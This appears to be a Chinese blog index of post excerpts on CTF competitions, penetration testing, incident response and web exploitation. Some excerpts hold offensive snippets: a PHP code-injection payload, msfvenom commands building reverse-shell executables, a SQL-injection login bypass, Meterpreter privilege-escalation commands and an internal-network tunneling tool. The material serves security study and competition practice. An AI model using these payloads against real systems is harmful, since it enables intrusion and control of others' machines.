摘要:
任务一 访问服务器8080端⼝,找出ecshop版本号,将版本号作为flag提交**(数字)** 通过访问http://IP:8080 可以看到页面首页存在版本信息 访问网站,利用漏洞找到网站根目录的flag1,将flag1作为flag提交。 因为在网站根目录,直接尝试访问http://IP/fla 阅读全文
posted @ 2022-06-13 10:09
Rlins
阅读(441)
评论(0)
推荐(0)
摘要:
第二阶段 任务一 第一题: ?dcn=);show_source("flag.php");// 第二题:输入密码查看flag 密码是:13546 第三题:修改前端输入框大小 第四题:burp抓包--res模块重放 第五题:wireshark 第242包追中http流 读取flag到burp解密 任务 阅读全文
posted @ 2022-06-13 10:08
Rlins
阅读(171)
评论(0)
推荐(0)
摘要:
Meterpreter Shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f exe > reverse.exe msfvenom -p windows/shell_reverse_tcp L 阅读全文
posted @ 2022-06-13 10:06
Rlins
阅读(101)
评论(0)
推荐(0)
摘要:
WAF是如何被绕过的 课程简介 WAF(Web应用防火墙,Web Application Firewall的简称)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的产品。WAF可以发现和拦截各类Web层面的攻击,记录攻击日志,实时预警提醒,在Web应用本身存在缺陷的情况下 阅读全文
posted @ 2022-06-13 10:05
Rlins
阅读(336)
评论(0)
推荐(1)
摘要:
应急响应 宏观题 1. 思路流程 信息收集>类型判断>抑制范围>深入分析>清理处置>输出报告 收集信息:收集客户信息和中毒主机信息,包括样本 判断类型:判断是否是安全事件,何种安全事件,勒索、挖矿、断网、DoS 等等 抑制范围:隔离使受害⾯不继续扩⼤ 深入分析:日志分析、进程分析、启动项分析、样本分 阅读全文
posted @ 2022-06-13 10:03
Rlins
阅读(2018)
评论(0)
推荐(1)
摘要:
编码 进制 十进制:20 八进制:024 十六进制:0x14 key和flag对应的ASCII key 107 101 121 KEY 75 69 89 flag 102 108 97 103 FLAG 70 76 65 71 Unicode 编码 例如:原文本:You had me at hell 阅读全文
posted @ 2022-06-13 10:03
Rlins
阅读(1515)
评论(0)
推荐(0)
摘要:
一、 基础技能&工具 常用方法 三要素:时间;地点;事件(系统、安全设备、相关应用、操作历史日志) 回溯攻击法:模拟攻击 经验法:常用目录(tmp; /var/tmp: dev/shm; RECYCLER);惯用手法(常见一句话木马;常见后门);常见恶意程序特征 日志 主机:应用程序 阅读全文
posted @ 2022-06-13 09:58
Rlins
阅读(193)
评论(0)
推荐(0)
摘要:
记一次从web到内网的渗透 拓扑图 环境介绍 现在有三台机器,分别为target1,target2,target3,里面分别有三个flag,每个flag的分值不同,需要通过拿下一个已知IP(target1)进而向内网里面进行渗透,最终要成功获得三台主机权限 渗透过程 target1 使用nmap进行 阅读全文
posted @ 2022-06-13 09:57
Rlins
阅读(437)
评论(0)
推荐(0)
摘要:
MISC 1. Utf-7解密 win7中utf-7工具解密 2. Wireshark分析 筛选http请求包,追踪流 3. wireshark文件导出 导出对象>>>http 4. png文件头补全 winhex打开文件,修改文件头89504E47为png文件头,打开图片得flag 504E47 阅读全文
posted @ 2022-06-13 09:56
Rlins
阅读(239)
评论(3)
推荐(0)
摘要:
一、ew正向代理 0x01 ew介绍 该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。 下载地址: https://github.com/idlefire/ew 0x02 使用方法 服务端(vps): -l 本地监听端口, 阅读全文
posted @ 2022-06-13 09:56
Rlins
阅读(1012)
评论(0)
推荐(0)
摘要:
第一题 打开页面发现http://10.196.8.21:18083/calculate/ 利用python的requests库做计算, import re import requests import time url = 'http://10.196.8.21:18083/calculate/' 阅读全文
posted @ 2022-06-13 09:51
Rlins
阅读(505)
评论(0)
推荐(0)
摘要:
一、 基础知识篇 1.1 linux基础 内核接口 x86-32 系统调用约定:Linux 系统调用使用寄存器传递参数。eax 为 syscall_number,ebx、ecx、edx、esi、ebp用于将 6 个参数传递给系统调用。返回值保存在 eax 中。所有其他寄存器(包括 EFLAGS)都保 阅读全文
posted @ 2022-06-13 09:50
Rlins
阅读(669)
评论(2)
推荐(0)
摘要:
php伪协议 相关知识 文件读取相关函数 include require include_once require_once highlight_file show_source readfile file_get_contents fopen file file://协议 allow_url_fo 阅读全文
posted @ 2022-06-13 09:49
Rlins
阅读(50)
评论(0)
推荐(0)
摘要:
代码执行函数绕过 eval、assert、system、passthru 正则 preg_replace ($pattern , $replacement , $subject ) $pattern为正则表达式 $replacement为替换字符串 $subject 为要搜索替换的目标字 阅读全文
posted @ 2022-06-13 09:49
Rlins
阅读(982)
评论(0)
推荐(0)
摘要:
常见的应急响应事件分类: web入侵:网页挂马、主页篡改、Webshell 系统入侵:病毒木马、勒索软件、远控后门 网络攻击:DDOS攻击、DNS劫持、ARP欺骗 入侵排查思路 web入侵:对中间价日志进行分析 系统入侵:计划任务,系统爆破痕迹(系统日志),进程进行分析 网络攻击:流量分析 1、 检 阅读全文
posted @ 2022-06-13 09:48
Rlins
阅读(327)
评论(0)
推荐(0)
摘要:
Meterpreter Shell命令 getsystem #会自动利用各种各样的系统漏洞来进行权限提升; migrate #进程id进程迁移; getuid #查看对方正在运行的用户; ps #列出所有的进程; getpid #返回运行meterpreter的id号; sysinfo #产看系统信 阅读全文
posted @ 2022-06-13 09:48
Rlins
阅读(375)
评论(0)
推荐(0)
摘要:
一、了解sql注入 sql注入 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 阅读全文
posted @ 2022-06-13 09:47
Rlins
阅读(918)
评论(0)
推荐(0)
摘要:
Phpinfo页面利用 system 获取具体版本,可以用来提权 extension_dir php扩展的路径,图省事没用lamp包有点捞…(这里还是说下linux不推荐用phpstudy,很多linux装了phpstudy系统会崩) http_x_real_ip 直接获取真实ip,无视代理、cdn 阅读全文
posted @ 2022-06-13 09:47
Rlins
阅读(309)
评论(0)
推荐(0)
摘要:
title: 记录对permate漏洞挖掘 categories: ctf 1.反射型xss 搜索框尝试xss语句,发现存在反射型xss 2.SQL注入 存在sql注入 --+注释,发现存在11个字段 http://10.196.8.31/home/index.php?m=tiezi&a=index 阅读全文
posted @ 2022-06-13 09:46
Rlins
阅读(73)
评论(0)
推荐(0)
摘要:
title: 记录对Piti's wonderful blog漏洞挖掘 categories: ctf 1.首页发现收索框,尝试xss,发现存在反射型xss漏洞 2.首页发现一个登陆框,发现万能用户登陆 admin’ or ‘1’=’1’ 3.用户登陆后看到写文章版,尝试存储型xss,过滤<scri 阅读全文
posted @ 2022-06-13 09:44
Rlins
阅读(18)
评论(0)
推荐(0)